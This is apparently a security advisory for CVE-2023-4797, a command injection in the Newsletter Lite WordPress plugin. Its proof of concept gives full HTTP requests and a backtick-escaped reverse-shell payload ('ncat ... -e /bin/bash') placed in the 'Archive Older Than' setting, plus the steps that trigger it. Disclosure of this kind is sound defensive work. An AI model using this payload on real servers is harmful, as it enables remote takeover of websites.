Newsletter Lite < 4.9.3 – Admin+ Command Injection | CVE 2023-4797

Description

The plugin does not properly escape user-controlled parameters when they are appended to SQL queries and shell commands, which could enable an administrator to run arbitrary commands on the server.

Proof of Concept

[1] Navigate to "Newsletters > Configuration > History & Emails Configuration"

======================

[2] Submit RCE Payload within "Archive Older Than" Field & Save Settings. The payload must be in HTTP parameter "emailarchive_olderthan" and escaped with backticks in format ` <PAYLOAD> `#, as shown below:

POST /wp-admin/admin.php?page=newsletters-settings HTTP/1.1
Host: 192.168.178.130
Content-Length: 13688
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.178.130
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5lVCjZQhpa9vBS0n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.178.130/wp-admin/admin.php?page=newsletters-settings
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: -- SNIP --
Connection: close

-- SNIP --

------WebKitFormBoundary5lVCjZQhpa9vBS0n
Content-Disposition: form-data; name="emailarchive_olderthan"

` ncat 192.168.1.127 -e /bin/bash `#
------WebKitFormBoundary5lVCjZQhpa9vBS0n
Content-Disposition: form-data; name="theme_folder"

default2
------WebKitFormBoundary5lVCjZQhpa9vBS0n
Content-Disposition: form-data; name="loadstyles[]"

newsletters-bootstrap
------WebKitFormBoundary5lVCjZQhpa9vBS0n
Content-Disposition: form-data; name="loadstyles_handles[newsletters-bootstrap]"

-- SNIP --

======================

[3] Trigger the Payload by Navigating to Newsletters > Configuration > Scheduled Tasks > Email Archiving , then click "Run Now". The below GET request will be issued:

GET /wp-admin/admin.php?page=newsletters-settings-tasks&method=runschedule&hook=newsletters_emailarchivehook HTTP/1.1
Host: 192.168.178.130
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.178.130/wp-admin/admin.php?page=newsletters-settings-tasks&wpmlupdated=true&wpmlmessage=Task+has+been+executed+successfully%21
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: -- SNIP --
Connection: close

======================

[4] The user's input will then be unsafely passed to PHP's exec() function, resulting in arbitrary command execution.